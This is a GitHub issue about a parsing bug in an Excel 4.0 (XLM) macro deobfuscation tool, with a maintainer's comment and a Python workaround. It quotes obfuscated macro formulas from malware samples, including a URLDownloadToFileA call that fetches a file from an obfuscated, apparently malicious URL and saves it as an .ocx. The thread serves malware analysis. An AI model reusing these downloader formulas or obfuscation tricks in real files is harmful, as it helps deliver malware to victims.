Error: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")& ...') #111

Open · cccs-jh (Contributor) opened this issue Jun 22, 2022 · 1 comment
Labels: bug (Something isn't working)
cccs-jh commented Jun 22, 2022

Running xlmdeobfuscator on this file:
https://www.virustotal.com/gui/file/a0de1f3af78bef68ddfcabf4b7cedfa0e466ac65648a5e81e591702b463c96b1
gives the following error:

Unencrypted xls file

[Loading Cells]
auto_open: auto_open->'KBRSBTL'!$J$1
[Starting Deobfuscation]
CELL:J12 , FullEvaluation , "False"
Error [deobfuscator.py:2586 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")&"al")&"ak")&"sh")&"mi.c")&"o")&"m/d")&"a",25352.0)=TEXT(((((("t"&"a_w")&"in")&"ni")&"ng/k")&"Yv6")&"xb/",3646.0)","..\peg1.ocx",0,0)') at line 1, column 69.
Expected one of:
* MULTIOP
* ADDITIVEOP
* CMPOP
* LIST_SEPARATOR
* L_PRA
* R_PRA
* CONCATOP
Previous tokens: [Token('STRING', '"http=TEXT(((((((((("')]

The raw XLM macro, as extracted by olevba, is:

' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: KBRSBTL, Macrosheet
' CELL:J12, =(((((((FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!G24)&'THJD'!D15)&'SGGSBe'!D8)&'THJD'!R19,J15)=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!D8)&'KBSNTND'!F24)&'KBSNTND'!L31,J17))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!H26)&'THJD'!D15)&'SGGSBe'!H13)&'THJD'!R19,J19))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!H13)&'KBSNTND'!F24)&'KBSNTND'!L31,J21))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!I24)&'THJD'!D15)&'SGGSBe'!M3)&'THJD'!R19,J23))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!M3)&'KBSNTND'!F24)&'KBSNTND'!L31,J25))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!J26)&'THJD'!D15)&'SGGSBe'!R17)&'THJD'!R19,J27))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&
'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!R17)&'KBSNTND'!F24)&'KBSNTND'!L31,J29))=FORMULA((('KBSNTND'!L24&'KBSNTND'!G44)&'KBSNTND'!H46)&'KBSNTND'!J44,J49), 1

kirk-sayre-work commented
https://www.virustotal.com/gui/file/756186368250a9902ae168c2f0c6a77d3fdd70f7a5589c36f8c7bd80cf8756e4 is another sample with this problem. I've looked a bit into this issue and it looks like there are 2 problems with analyzing the sample:

  1. Things like '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http=TEXT(((((((((("s"&":/")&"/m-a")&"in")&"su")&"ra")&"nc")&"e.c")&"o")&"m/w")&"p-a",25352.0)=TEXT((((((((("d"&"m")&"i")&"n/OR")&"iP")&"BS")&"tK")&"NO")&"nI")&"V/",3646.0)","..\udh1.ocx",0,0)' are not parsing because the double quotes in the TEXT() expressions in the "http=..." string are not escaped as '""', so the string is invalid.
  2. The next problem (I wrote a hacky patch in my local XLMMacroDeobfuscator to get past the 1st problem) is that the TEXT() expressions that appear inside the "http=..." string are not emulated, they just remain as-is in the string. I'm not familiar enough with XLM macros to know whether XLM formula calls are supposed to be resolved inside string literals or not, but it looks like maybe they do get resolved?
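The two problems listed in the comment above can be reproduced and worked around outside the tool. The following is an added example, not code from XLMMacroDeobfuscator or from either commenter: a minimal scanner that applies Excel's rule that a quote inside a string literal is written as `""`, reporting the column at which an intended literal ends early (problem 1), and a best-effort pass that evaluates the `=TEXT(<concatenation>, <format>)` expressions embedded in that literal and splices the result back (problem 2). The `SAMPLE` formula is constructed to mirror the shape of the quoted CALL() with a placeholder host, path and file name; all function names are this example's own; and the rewrite assumes, as Excel's TEXT() does for a text value, that the value is returned unchanged so the numeric format argument is irrelevant. Whether the deobfuscator should resolve these expressions the same way is the open question in the thread, not something this example settles.

```python
import re

# Excel/XLM string literal: a quote inside the string is written as two quotes ("").
STRING_LIT = re.compile(r'"(?:[^"]|"")*"')
TEXT_CALL = re.compile(r'=?TEXT\(')

# Constructed sample shaped like the CALL() formula quoted in the comment above;
# host, path and file name are placeholders, not values from the real sample.
SAMPLE = (
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,'
    '"http=TEXT((("s"&":/")&"/ex")&"ample.",25352.0)'
    '=TEXT(("te"&"st/")&"x",3646.0)",'
    '"..\\sample.ocx",0,0)'
)

def escape_literal(text):
    """Render text as a well-formed XLM string literal."""
    return '"' + text.replace('"', '""') + '"'

def unescape_literal(lit):
    """Inverse of escape_literal for a well-formed literal (quotes included)."""
    return lit[1:-1].replace('""', '"')

def _skip_literal(s, i):
    """Index just past the string literal that starts at s[i]."""
    m = STRING_LIT.match(s, i)
    if not m:
        raise ValueError(f"unterminated string literal at col {i + 1}")
    return m.end()

def unescaped_quote_problems(formula):
    """Problem 1: a literal whose closing quote is directly followed by something that
    cannot follow a string (no operator, separator or parenthesis) had an inner quote
    that was not doubled. Returns (1-based column, literal, offending char) per hit."""
    problems = []
    for m in STRING_LIT.finditer(formula):
        nxt = formula[m.end():m.end() + 1]
        if nxt and nxt not in '&=,()+-*/<>;' and not nxt.isspace():
            problems.append((m.end() + 1, m.group(), nxt))
    return problems

def _scan_args(s, open_idx):
    """From s[open_idx] == '(', return (index of the matching ')', top-level argument
    texts), skipping string literals and nested parentheses."""
    depth, parts, start, i = 0, [], open_idx + 1, open_idx
    while i < len(s):
        c = s[i]
        if c == '"':
            i = _skip_literal(s, i)
            continue
        if c == '(':
            depth += 1
        elif c == ')':
            depth -= 1
            if depth == 0:
                parts.append(s[start:i])
                return i, parts
        elif c == ',' and depth == 1:
            parts.append(s[start:i])
            start = i + 1
        i += 1
    raise ValueError("unbalanced parentheses")

def eval_concat(expr):
    """Evaluate an expression made only of string literals, '&' and parentheses."""
    out, pos = [], 0
    while pos < len(expr):
        c = expr[pos]
        if c == '"':
            end = _skip_literal(expr, pos)
            out.append(unescape_literal(expr[pos:end]))
            pos = end
        elif c in '&()' or c.isspace():
            pos += 1
        else:
            raise ValueError(f"unsupported token {c!r} at col {pos + 1}")
    return ''.join(out)

def resolve_text_calls(s):
    """Problem 2: replace each embedded `=TEXT(<concat>, <fmt>)` with the concatenated
    text. Assumption (as in Excel): TEXT() returns a text value unchanged, so the
    numeric format argument (25352.0, 3646.0) has no effect."""
    out, i = [], 0
    while True:
        m = TEXT_CALL.search(s, i)
        if not m:
            out.append(s[i:])
            return ''.join(out)
        out.append(s[i:m.start()])
        close, args = _scan_args(s, m.end() - 1)
        out.append(eval_concat(','.join(args[:-1])))
        i = close + 1

def call_arguments(formula):
    """Arguments of a top-level =CALL(...), with string literals unescaped."""
    m = re.match(r'=CALL\(', formula)
    if not m:
        raise ValueError("not a CALL() formula")
    _, args = _scan_args(formula, m.end() - 1)
    args = [a.strip() for a in args]
    return [unescape_literal(a) if STRING_LIT.fullmatch(a) else a for a in args]
```

Running `unescaped_quote_problems(SAMPLE)` reports the first break at column 62, right after the literal `"http=TEXT((("`, which is the same class of failure the Lark error above describes (previous token a STRING, next token something no grammar rule allows after a string). `resolve_text_calls(SAMPLE)` then yields a well-formed formula whose fifth CALL() argument is the reassembled URL, and `call_arguments` confirms that the rewritten formula parses as an ordinary argument list; `escape_literal` shows what the argument would have had to look like for the strict parser to accept it unchanged.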

@DissectMalware DissectMalware self-assigned this Jun 29, 2022
@DissectMalware DissectMalware added the bug Something isn't working label Jun 29, 2022